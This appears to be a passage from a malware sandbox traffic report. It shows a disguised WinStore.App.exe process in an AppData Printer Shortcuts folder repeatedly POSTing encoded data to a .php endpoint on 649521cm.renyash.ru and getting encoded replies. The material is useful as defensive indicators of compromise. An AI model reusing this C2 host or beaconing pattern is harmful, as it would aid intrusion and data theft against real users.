444VJ~{mVZoL{\~btX~^o@^Wn]p}[dc]~QyO~Yvu`Ki[xUKqBwLsDk\j\\|iToXR}p\|Yv\qwXmJa}\}Bp~gYuL{\|\[j^uJ{YcXoI^M{}dXnbpl`fLscYxItK~q{OapHzQA[kg\|}a_NaBx{\|sXvcby_qI}\|jLza_ZwsxXuX{[wazP~]y_wbmvf`Rewolp\|ooso^fkmZ`^\|~bT~}oxSa_~\\]{]FQ}\|QPcx\|daYlC\|Z{\\|K~qQKiwg\|pWA{ptB~\\|FtpaQ{\ywf`\|vd}v[wbULyM}gj{Xt~s{Jvb[tayOrK~RtN~YUJwa{I{ryJ~NqJxI^{w`BymsIy\lzsfNNlxIp}bQMual}\|}gZ}quuR`{lpIwpTzayH\|lb{aXuM{v_pv
Dec 26, 2024 10:22:45.278812885 CET	658	IN	Data Raw: 61 76 41 7f 5e 6a 03 74 62 75 01 75 5b 5e 0a 7f 6c 61 06 77 6c 68 07 7c 73 52 49 79 7c 5d 03 7b 60 72 06 7c 7d 70 08 74 77 68 07 7d 4c 6e 0d 7e 53 73 09 7b 53 5c 05 7d 5c 79 4d 7c 60 74 08 7c 52 52 43 7d 4e 52 41 7c 67 62 4d 78 7d 67 01 78 5c 78 Data Ascii: avA^jtbuu[^lawlh\|sRIy\|]{`r\|}ptwh}Ln~Ss{S\}\yM\|`t\|RRC}NRA\|gbMx}gx\xqw~wUON}@zM\|B}\^It]Wz_qvHp~vh@}Xmvb}by\|wPxHh\|sUuLitO}H\|_~}lx~gUuqw{L_~`iyg`Nxw\|{S{zLpH{]r{]NZ{gx~Lou_{\iRlX}wR@havRaB`lo\|HvpTmOf]jlf_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49805	104.21.38.84	80	5440	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 10:22:56.864846945 CET	343	OUT	POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 649521cm.renyash.ru Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Dec 26, 2024 10:22:57.214713097 CET	336	OUT	Data Raw: 00 03 04 07 06 0f 01 0b 05 06 02 01 02 05 01 01 00 05 05 09 02 04 03 0e 00 52 0e 54 06 00 03 02 0e 05 07 09 00 06 05 52 0d 02 07 57 07 06 06 0e 03 03 0b 0e 0f 0f 01 06 04 00 06 02 01 01 07 0d 05 02 0e 0a 05 00 04 53 0e 50 0e 05 0c 05 0c 02 07 02 Data Ascii: RTRWSPUTU\L~^rOcqvYwe]QRut\|kccYlRQz`vhTcPc^hO}_~V@A{SrA~_y
Dec 26, 2024 10:22:57.951976061 CET	25	IN	HTTP/1.1 100 Continue
Dec 26, 2024 10:22:58.293488026 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 09:22:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UARBcCNVCjzpBPNNP%2FCVRTZCYUKu62iImIt3vFAz6Vn9KwGq%2FKe68%2BPHbGBoBiVYMbesHFrHcs4qNUlYtbZOcudtbBDFYSmfo1BlO4uqv%2BtLylqUYFckS1wTm5XGJn22GPhgo13q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8002673c9cde95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2894&min_rtt=1440&rtt_var=3449&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=679&delivery_rate=111637&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 34 34 0d 0a 56 4a 7e 06 6c 6d 73 00 6c 62 63 5d 68 4f 59 4b 7e 59 64 54 7f 4e 71 4f 79 63 5e 4d 6a 5c 56 03 76 70 7d 4f 6d 4f 53 4a 75 65 7f 5b 7c 61 78 01 55 4b 71 42 77 4c 73 44 6b 5c 6a 5c 7c 01 69 54 6f 58 52 08 7d 70 7c 59 76 5c 71 07 77 58 6d 4a 7f 61 7d 5c 7d 42 70 08 7e 67 59 01 75 4c 7b 06 7c 5c 75 00 7e 4e 79 4b 78 59 5a 06 79 67 6c 04 79 6e 6b 49 78 61 70 00 7a 73 62 4e 68 5e 63 5e 6c 67 74 07 7d 72 74 5f 76 61 51 58 7a 51 41 5b 6b 67 7c 0d 7d 61 5f 4e 61 42 78 03 7b 7c 73 58 76 63 62 0c 79 5f 71 49 7d 7c 6a 4c 7a 61 5f 5a 77 73 78 58 75 58 7b 5b 77 61 7a 50 7e 5d 79 5f 77 62 6d 04 76 66 60 09 7f 52 65 05 77 6f 6c 04 7f 70 7c 00 6f 6f 73 03 6f 5e 66 02 6b 6d 5a 08 60 5e 7c 04 7e 62 54 09 7e 7d 6f 09 78 53 61 5f 7e 5c 5c 5d 7b 5d 46 51 7d 7c 51 50 7f 63 78 0a 7c 64 61 59 6c 43 7c 5a 7b 5c 7c 4b 7e 71 51 4b 69 77 67 0b 7c 70 57 41 7b 70 74 42 7e 5c 7c 46 74 70 61 51 7b 5c 79 02 77 66 60 03 7c 76 64 06 7d 76 5b 0c 77 62 55 07 7f 4c 79 4d 7d 67 6a 0c 7b 58 74 0c 7e 73 7b 4a 76 62 5b 06 74 [TRUNCATED] Data Ascii: 444VJ~lmslbc]hOYK~YdTNqOyc^Mj\Vvp}OmOSJue[\|axUKqBwLsDk\j\\|iToXR}p\|Yv\qwXmJa}\}Bp~gYuL{\|\u~NyKxYZyglynkIxapzsbNh^c^lgt}rt_vaQXzQA[kg\|}a_NaBx{\|sXvcby_qI}\|jLza_ZwsxXuX{[wazP~]y_wbmvf`Rewolp\|ooso^fkmZ`^\|~bT~}oxSa_~\\]{]FQ}\|QPcx\|daYlC\|Z{\\|K~qQKiwg\|pWA{ptB~\\|FtpaQ{\ywf`\|vd}v[wbULyM}gj{Xt~s{Jvb[tayOrK~RtN~YUJwa{I{ryJ~NqJxI^{w`BymsIy\lzsfNNlxIp}bQMual}\|}gZ}quuR`{lpIwpTzayH\|lb{aXuM{v_p
Dec 26, 2024 10:22:58.293549061 CET	660	IN	Data Raw: 02 76 61 76 41 7f 5e 6a 03 74 62 75 01 75 5b 5e 0a 7f 6c 61 06 77 6c 68 07 7c 73 52 49 79 7c 5d 03 7b 60 72 06 7c 7d 70 08 74 77 68 07 7d 4c 6e 0d 7e 53 73 09 7b 53 5c 05 7d 5c 79 4d 7c 60 74 08 7c 52 52 43 7d 4e 52 41 7c 67 62 4d 78 7d 67 01 78 Data Ascii: vavA^jtbuu[^lawlh\|sRIy\|]{`r\|}ptwh}Ln~Ss{S\}\yM\|`t\|RRC}NRA\|gbMx}gx\xqw~wUON}@zM\|B}\^It]Wz_qvHp~vh@}Xmvb}by\|wPxHh\|sUuLitO}H\|_~}lx~gUuqw{L_~`iyg`Nxw\|{S{zLpH{]r{]NZ{gx~Lou_{\iRlX}wR@havRaB`lo\|HvpTmOf]jl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49834	104.21.38.84	80	828	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 10:23:09.631072998 CET	307	OUT	POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 649521cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 26, 2024 10:23:09.980571032 CET	344	OUT	Data Raw: 00 07 04 04 06 00 01 02 05 06 02 01 02 0d 01 03 00 04 05 0e 02 00 03 01 07 0f 0c 54 05 0e 03 52 0f 04 07 0d 02 00 05 0b 0d 0a 07 0b 04 07 05 56 05 0a 0f 09 0c 01 05 52 04 55 07 02 01 0a 05 0c 01 07 0f 5c 05 0f 04 52 0d 57 0e 05 0e 0c 0e 56 04 0d Data Ascii: TRVRU\RWVPUQQ\L}QkszNtmbeRkli`Uk^p`Kyl^vIS\|wYs^~e~V@x}T~r[
Dec 26, 2024 10:23:10.707240105 CET	25	IN	HTTP/1.1 100 Continue
Dec 26, 2024 10:23:11.032952070 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 09:23:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dBv%2BGIbQSY%2B3VDJ2SVwGvpV6AmgLHYs5R1Z98tTTgr%2F%2F5Y%2BJ%2BFNgNXKjY9AG4yf%2FW6GrzMnLXlP1kEFI0NspXYJfJjZWzErYcpEBKG51Hdtwvr%2BDfKiHG6VUf3jsCv03OZeHacbP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8002b6fe078c59-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4786&min_rtt=2005&rtt_var=6314&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=651&delivery_rate=60196&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 34 34 0d 0a 56 4a 7d 59 7b 7d 56 58 6f 5b 74 04 7f 58 77 4a 69 67 5a 53 7e 70 53 42 7a 63 70 05 69 5b 6c 01 74 73 71 0d 7b 61 7a 58 76 76 7b 58 69 71 78 01 55 4b 71 42 77 4c 73 44 6b 5c 6a 5c 7c 01 69 54 6f 58 52 08 7d 70 7c 59 76 5c 71 07 77 58 6d 4a 7f 61 7d 5c 7d 42 70 08 7e 67 59 01 75 4c 7b 06 7c 5b 7e 58 7e 5e 61 44 7b 67 7c 01 7b 77 7c 01 78 7e 63 49 78 71 63 58 6c 4d 5c 04 7f 59 6b 5e 6f 67 63 5a 6a 04 78 5f 61 62 6f 5c 7a 51 41 5b 6b 67 7c 0d 7d 61 5f 4e 61 42 78 03 7b 7c 73 58 76 63 62 0c 79 5f 71 49 7d 7c 6a 4c 7a 61 5f 5a 77 73 78 58 75 58 7b 5b 77 61 7a 50 7e 5d 79 5f 77 62 6d 04 76 66 60 09 7f 52 65 05 77 6f 6c 04 7f 70 7c 00 6f 6f 73 03 6f 5e 66 02 6b 6d 5a 08 60 5e 7c 04 7e 62 54 09 7e 7d 6f 09 78 53 61 5f 7e 5c 5c 5d 7b 5d 46 51 7d 7c 51 50 7f 63 78 0a 7c 64 61 59 6c 43 7c 5a 7b 5c 7c 4b 7e 71 51 4b 69 77 67 0b 7c 70 57 41 7b 70 74 42 7e 5c 7c 46 74 70 61 51 7b 5c 79 02 77 66 60 03 7c 76 64 06 7d 76 5b 0c 77 62 55 07 7f 4c 79 4d 7d 67 6a 0c 7b 58 74 0c 7e 73 7b 4a 76 62 5b 06 74 [TRUNCATED] Data Ascii: 444VJ}Y{}VXo[tXwJigZS~pSBzcpi[ltsq{azXvv{XiqxUKqBwLsDk\j\\|iToXR}p\|Yv\qwXmJa}\}Bp~gYuL{\|[~X~^aD{g\|{w\|x~cIxqcXlM\Yk^ogcZjx_abo\zQA[kg\|}a_NaBx{\|sXvcby_qI}\|jLza_ZwsxXuX{[wazP~]y_wbmvf`Rewolp\|ooso^fkmZ`^\|~bT~}oxSa_~\\]{]FQ}\|QPcx\|daYlC\|Z{\\|K~qQKiwg\|pWA{ptB~\\|FtpaQ{\ywf`\|vd}v[wbULyM}gj{Xt~s{Jvb[tayOrK~RtN~YUJwa{I{ryJ~NqJxI^{w`BymsIy\lzsfNNlxIp}bQMual}\|}gZ}quuR`{lpIwpTzayH\|lb{aXuM{
Dec 26, 2024 10:23:11.033154011 CET	664	IN	Data Raw: 07 76 5f 70 02 76 61 76 41 7f 5e 6a 03 74 62 75 01 75 5b 5e 0a 7f 6c 61 06 77 6c 68 07 7c 73 52 49 79 7c 5d 03 7b 60 72 06 7c 7d 70 08 74 77 68 07 7d 4c 6e 0d 7e 53 73 09 7b 53 5c 05 7d 5c 79 4d 7c 60 74 08 7c 52 52 43 7d 4e 52 41 7c 67 62 4d 78 Data Ascii: v_pvavA^jtbuu[^lawlh\|sRIy\|]{`r\|}ptwh}Ln~Ss{S\}\yM\|`t\|RRC}NRA\|gbMx}gx\xqw~wUON}@zM\|B}\^It]Wz_qvHp~vh@}Xmvb}by\|wPxHh\|sUuLitO}H\|_~}lx~gUuqw{L_~`iyg`Nxw\|{S{zLpH{]r{]NZ{gx~Lou_{\iRlX}wR@havRaB`lo\|HvpTmO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49865	104.21.38.84	80	5580	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 10:23:22.147296906 CET	360	OUT	POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 649521cm.renyash.ru Content-Length: 332 Expect: 100-continue Connection: Keep-Alive
Dec 26, 2024 10:23:22.496273041 CET	332	OUT	Data Raw: 00 0b 04 00 06 0f 04 06 05 06 02 01 02 05 01 03 00 04 05 08 02 06 03 0a 00 51 0f 02 03 0f 01 00 0d 53 07 08 03 0d 03 0a 0c 53 04 03 04 01 05 55 04 50 0e 09 0d 05 06 0b 07 03 06 04 07 01 00 0e 01 03 0f 5e 00 07 04 04 0c 0e 0e 01 0d 00 0f 06 05 50 Data Ascii: QSSUP^P^ZRUTQSR\L~pTOtaaLve`\|BaLwo`~p\|yo\|Yl^}YCRNtwo]e~V@x}~Oy\_
Dec 26, 2024 10:23:23.232242107 CET	25	IN	HTTP/1.1 100 Continue
Dec 26, 2024 10:23:23.563349962 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 09:23:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xJx5HMBTipJWBRrT%2BhMkSLyNSxF%2FqnF2pPHtfK%2FQgOwoxxgPMaugkEodFtGJNbffeHcd66jcBhQmQoLSGDSjYRSJTb8ea2OUCITKjjhNKdziHKqBN7VAI5V6k%2BGDCSIbDig0l0B9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8003053e346a52-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3702&min_rtt=1733&rtt_var=4589&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=692&delivery_rate=83466&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 34 34 0d 0a 56 4a 7e 4d 78 54 6b 4a 6c 72 60 00 7e 71 63 00 7d 67 77 0c 7c 60 7d 41 79 63 6c 4d 7d 04 6f 59 63 73 79 40 6d 4f 57 03 75 76 67 5e 6a 5b 78 01 55 4b 71 42 77 4c 73 44 6b 5c 6a 5c 7c 01 69 54 6f 58 52 08 7d 70 7c 59 76 5c 71 07 77 58 6d 4a 7f 61 7d 5c 7d 42 70 08 7e 67 59 01 75 4c 7b 06 7c 5c 50 58 7c 70 69 03 7b 59 7c 4e 6c 59 7f 5d 6c 6d 7b 04 6d 61 6f 59 6f 5d 50 4c 7c 59 63 5e 6c 67 6c 49 7c 72 77 06 62 58 60 02 7a 51 41 5b 6b 67 7c 0d 7d 61 5f 4e 61 42 78 03 7b 7c 73 58 76 63 62 0c 79 5f 71 49 7d 7c 6a 4c 7a 61 5f 5a 77 73 78 58 75 58 7b 5b 77 61 7a 50 7e 5d 79 5f 77 62 6d 04 76 66 60 09 7f 52 65 05 77 6f 6c 04 7f 70 7c 00 6f 6f 73 03 6f 5e 66 02 6b 6d 5a 08 60 5e 7c 04 7e 62 54 09 7e 7d 6f 09 78 53 61 5f 7e 5c 5c 5d 7b 5d 46 51 7d 7c 51 50 7f 63 78 0a 7c 64 61 59 6c 43 7c 5a 7b 5c 7c 4b 7e 71 51 4b 69 77 67 0b 7c 70 57 41 7b 70 74 42 7e 5c 7c 46 74 70 61 51 7b 5c 79 02 77 66 60 03 7c 76 64 06 7d 76 5b 0c 77 62 55 07 7f 4c 79 4d 7d 67 6a 0c 7b 58 74 0c 7e 73 7b 4a 76 62 5b 06 74 [TRUNCATED] Data Ascii: 444VJ~MxTkJlr`~qc}gw\|`}AyclM}oYcsy@mOWuvg^j[xUKqBwLsDk\j\\|iToXR}p\|Yv\qwXmJa}\}Bp~gYuL{\|\PX\|pi{Y\|NlY]lm{maoYo]PL\|Yc^lglI\|rwbX`zQA[kg\|}a_NaBx{\|sXvcby_qI}\|jLza_ZwsxXuX{[wazP~]y_wbmvf`Rewolp\|ooso^fkmZ`^\|~bT~}oxSa_~\\]{]FQ}\|QPcx\|daYlC\|Z{\\|K~qQKiwg\|pWA{ptB~\\|FtpaQ{\ywf`\|vd}v[wbULyM}gj{Xt~s{Jvb[tayOrK~RtN~YUJwa{I{ryJ~NqJxI^{w`BymsIy\lzsfNNlxIp}bQMual}\|}gZ}quuR`{lpIwpTzayH\|lb{aXuM{v_p
Dec 26, 2024 10:23:23.563376904 CET	659	IN	Data Raw: 76 61 76 41 7f 5e 6a 03 74 62 75 01 75 5b 5e 0a 7f 6c 61 06 77 6c 68 07 7c 73 52 49 79 7c 5d 03 7b 60 72 06 7c 7d 70 08 74 77 68 07 7d 4c 6e 0d 7e 53 73 09 7b 53 5c 05 7d 5c 79 4d 7c 60 74 08 7c 52 52 43 7d 4e 52 41 7c 67 62 4d 78 7d 67 01 78 5c Data Ascii: vavA^jtbuu[^lawlh\|sRIy\|]{`r\|}ptwh}Ln~Ss{S\}\yM\|`t\|RRC}NRA\|gbMx}gx\xqw~wUON}@zM\|B}\^It]Wz_qvHp~vh@}Xmvb}by\|wPxHh\|sUuLitO}H\|_~}lx~gUuqw{L_~`iyg`Nxw\|{S{zLpH{]r{]NZ{gx~Lou_{\iRlX}wR@havRaB`lo\|HvpTmOf]jlf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49894	104.21.38.84	80	7124	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 10:23:34.657239914 CET	360	OUT	POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 649521cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 26, 2024 10:23:35.011635065 CET	344	OUT	Data Raw: 00 00 04 06 06 0e 01 0b 05 06 02 01 02 01 01 0a 00 05 05 09 02 0d 03 0a 00 05 0e 06 05 05 06 04 0d 53 05 0d 00 01 03 06 0e 03 02 07 07 51 06 03 06 06 0f 00 0f 50 05 01 06 05 05 01 06 00 05 0f 01 00 0d 00 04 03 05 00 0b 0e 0d 05 0f 06 0d 06 02 03 Data Ascii: SQPT\L~k^i]wriMvewRk}cRhhcUXoRsJl^v\|CZwto_~_~V@zmnNby
Dec 26, 2024 10:23:35.742151976 CET	25	IN	HTTP/1.1 100 Continue
Dec 26, 2024 10:23:36.069084883 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 09:23:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4m5rwhgdi7TuxOO47tDn1wV2Np2fwkcCPm6qYZM6TWkZjxb3hsr9CmJbXW1j6%2Bu%2BWfk2PEXc9prtoFhv9dkyORUUFMyujJsaaddrxslwA1IlQ6MOjcI%2BIB%2FmXxmDckZcSPE6E2qJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f800353691e43b2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4333&min_rtt=1608&rtt_var=6054&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=704&delivery_rate=62355&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 34 34 0d 0a 56 4a 7d 5d 6f 6d 5e 5f 6c 5c 5a 01 7f 72 60 58 6a 59 6f 0a 7f 63 6a 54 6e 5d 70 05 7f 61 7c 00 60 60 69 09 6e 61 53 00 61 58 64 4b 7d 71 78 01 55 4b 71 42 77 4c 73 44 6b 5c 6a 5c 7c 01 69 54 6f 58 52 08 7d 70 7c 59 76 5c 71 07 77 58 6d 4a 7f 61 7d 5c 7d 42 70 08 7e 67 59 01 75 4c 7b 06 7c 5b 71 02 6a 60 7e 58 7b 67 52 04 79 64 70 06 6f 53 73 46 6d 5c 6c 48 7b 60 62 06 7f 59 60 07 7b 5e 63 58 7d 5c 7b 04 75 07 67 5c 7a 51 41 5b 6b 67 7c 0d 7d 61 5f 4e 61 42 78 03 7b 7c 73 58 76 63 62 0c 79 5f 71 49 7d 7c 6a 4c 7a 61 5f 5a 77 73 78 58 75 58 7b 5b 77 61 7a 50 7e 5d 79 5f 77 62 6d 04 76 66 60 09 7f 52 65 05 77 6f 6c 04 7f 70 7c 00 6f 6f 73 03 6f 5e 66 02 6b 6d 5a 08 60 5e 7c 04 7e 62 54 09 7e 7d 6f 09 78 53 61 5f 7e 5c 5c 5d 7b 5d 46 51 7d 7c 51 50 7f 63 78 0a 7c 64 61 59 6c 43 7c 5a 7b 5c 7c 4b 7e 71 51 4b 69 77 67 0b 7c 70 57 41 7b 70 74 42 7e 5c 7c 46 74 70 61 51 7b 5c 79 02 77 66 60 03 7c 76 64 06 7d 76 5b 0c 77 62 55 07 7f 4c 79 4d 7d 67 6a 0c 7b 58 74 0c 7e 73 7b 4a 76 62 5b 06 74 [TRUNCATED] Data Ascii: 444VJ}]om^_l\Zr`XjYocjTn]pa\|``inaSaXdK}qxUKqBwLsDk\j\\|iToXR}p\|Yv\qwXmJa}\}Bp~gYuL{\|[qj`~X{gRydpoSsFm\lH{`bY`{^cX}\{ug\zQA[kg\|}a_NaBx{\|sXvcby_qI}\|jLza_ZwsxXuX{[wazP~]y_wbmvf`Rewolp\|ooso^fkmZ`^\|~bT~}oxSa_~\\]{]FQ}\|QPcx\|daYlC\|Z{\\|K~qQKiwg\|pWA{ptB~\\|FtpaQ{\ywf`\|vd}v[wbULyM}gj{Xt~s{Jvb[tayOrK~RtN~YUJwa{I{ryJ~NqJxI^{w`BymsIy\lzsfNNlxIp}bQMual}\|}gZ}quuR`{lpIwpTzayH\|lb{aXuM{v_p
Dec 26, 2024 10:23:36.069180965 CET	659	IN	Data Raw: 76 61 76 41 7f 5e 6a 03 74 62 75 01 75 5b 5e 0a 7f 6c 61 06 77 6c 68 07 7c 73 52 49 79 7c 5d 03 7b 60 72 06 7c 7d 70 08 74 77 68 07 7d 4c 6e 0d 7e 53 73 09 7b 53 5c 05 7d 5c 79 4d 7c 60 74 08 7c 52 52 43 7d 4e 52 41 7c 67 62 4d 78 7d 67 01 78 5c Data Ascii: vavA^jtbuu[^lawlh\|sRIy\|]{`r\|}ptwh}Ln~Ss{S\}\yM\|`t\|RRC}NRA\|gbMx}gx\xqw~wUON}@zM\|B}\^It]Wz_qvHp~vh@}Xmvb}by\|wPxHh\|sUuLitO}H\|_~}lx~gUuqw{L_~`iyg`Nxw\|{S{zLpH{]r{]NZ{gx~Lou_{\iRlX}wR@havRaB`lo\|HvpTmOf]jlf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49915	104.21.38.84	80	3656	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 10:23:43.128113031 CET	342	OUT	POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 649521cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 26, 2024 10:23:43.480618000 CET	344	OUT	Data Raw: 05 07 01 06 03 0a 01 0a 05 06 02 01 02 0d 01 02 00 02 05 00 02 07 03 0e 02 56 0a 06 03 0f 06 05 0c 04 04 0f 07 02 06 0a 0d 06 05 06 06 53 05 04 06 01 0c 0d 0d 07 01 00 04 03 06 04 06 51 06 0e 00 00 0e 59 04 0e 04 08 0e 02 0d 02 0f 03 0f 08 06 03 Data Ascii: VSQYXQ\L~~pXw[n^uKcQhBStpOh]loUdYz`e[hntvwh~O~V@xmr}Li
Dec 26, 2024 10:23:44.213403940 CET	25	IN	HTTP/1.1 100 Continue
Dec 26, 2024 10:23:44.472907066 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 09:23:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jWGHohgCt%2FZ66B90lK5%2FYdQNWM0AHhDLJCph8wFqsWS%2FBKX26Jxi28zL7QPOrs7857BCCIOQr1HNi%2BqtrC5YsG2wTVoBLDcP6bx%2BkF%2BBeEs%2Fahpmvd6eVK0qV8ZrA4a5%2B2fx1yBW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8003885dbf8c83-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4321&min_rtt=1882&rtt_var=5584&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=686&delivery_rate=68237&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 34 34 0d 0a 56 4a 7e 01 6f 53 59 02 7b 4c 70 48 7f 72 78 58 6a 5e 73 0b 7c 06 66 51 79 73 5e 04 6a 62 70 02 76 60 79 40 79 61 58 58 76 5f 60 48 6a 4b 78 01 55 4b 71 42 77 4c 73 44 6b 5c 6a 5c 7c 01 69 54 6f 58 52 08 7d 70 7c 59 76 5c 71 07 77 58 6d 4a 7f 61 7d 5c 7d 42 70 08 7e 67 59 01 75 4c 7b 06 7c 5b 61 00 7e 60 75 06 7b 59 5d 5c 7b 77 73 5c 7b 43 55 46 6d 72 63 5a 7b 05 6d 5e 7d 73 74 4b 78 77 63 5f 7c 72 7c 5d 62 5f 5d 5d 7a 51 41 5b 6b 67 7c 0d 7d 61 5f 4e 61 42 78 03 7b 7c 73 58 76 63 62 0c 79 5f 71 49 7d 7c 6a 4c 7a 61 5f 5a 77 73 78 58 75 58 7b 5b 77 61 7a 50 7e 5d 79 5f 77 62 6d 04 76 66 60 09 7f 52 65 05 77 6f 6c 04 7f 70 7c 00 6f 6f 73 03 6f 5e 66 02 6b 6d 5a 08 60 5e 7c 04 7e 62 54 09 7e 7d 6f 09 78 53 61 5f 7e 5c 5c 5d 7b 5d 46 51 7d 7c 51 50 7f 63 78 0a 7c 64 61 59 6c 43 7c 5a 7b 5c 7c 4b 7e 71 51 4b 69 77 67 0b 7c 70 57 41 7b 70 74 42 7e 5c 7c 46 74 70 61 51 7b 5c 79 02 77 66 60 03 7c 76 64 06 7d 76 5b 0c 77 62 55 07 7f 4c 79 4d 7d 67 6a 0c 7b 58 74 0c 7e 73 7b 4a 76 62 5b 06 74 [TRUNCATED] Data Ascii: 444VJ~oSY{LpHrxXj^s\|fQys^jbpv`y@yaXXv_`HjKxUKqBwLsDk\j\\|iToXR}p\|Yv\qwXmJa}\}Bp~gYuL{\|[a~`u{Y]\{ws\{CUFmrcZ{m^}stKxwc_\|r\|]b_]]zQA[kg\|}a_NaBx{\|sXvcby_qI}\|jLza_ZwsxXuX{[wazP~]y_wbmvf`Rewolp\|ooso^fkmZ`^\|~bT~}oxSa_~\\]{]FQ}\|QPcx\|daYlC\|Z{\\|K~qQKiwg\|pWA{ptB~\\|FtpaQ{\ywf`\|vd}v[wbULyM}gj{Xt~s{Jvb[tayOrK~RtN~YUJwa{I{ryJ~NqJxI^{w`BymsIy\lzsfNNlxIp}bQMual}\|}gZ}quuR`{lpIwpTzayH\|lb{aX
